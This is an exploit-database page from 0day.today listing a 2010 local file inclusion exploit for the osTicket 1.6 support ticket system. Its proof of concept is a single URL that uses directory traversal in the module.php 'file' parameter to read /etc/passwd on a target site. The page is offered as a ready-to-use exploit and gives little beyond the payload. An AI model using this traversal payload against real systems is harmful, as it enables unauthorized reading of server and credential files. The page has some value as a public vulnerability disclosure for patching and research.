[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

osTicket 1.6 - Local File Inclusion

Author
d3v1l
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14773
Category
web applications
Date add
10-11-2010
Platform
php
===================================
osTicket 1.6 - Local File Inclusion
===================================

[~]----------------------------------------------------------------------------------------------------------------------
[~] osTicket - Open Source Support Ticket System (module=osTicket&file=) Local File Inclusion 
[~]
[~] http://osticket.com
[~] 
[~]
[~] ----------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 8.11.2010
[~]
[~]
[~] http://security-sh3ll.blogspot.com | http://twitter.com/securityshell
[~]
[~] ----------------------------------------------------------------------------------------
[~] Poc :-
[~]
[~] http://site.com/module.php?module=osTicket&file=../../../../../../../../../../../../../../etc/passwd
[~] 
[~]-----------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-12-26]  #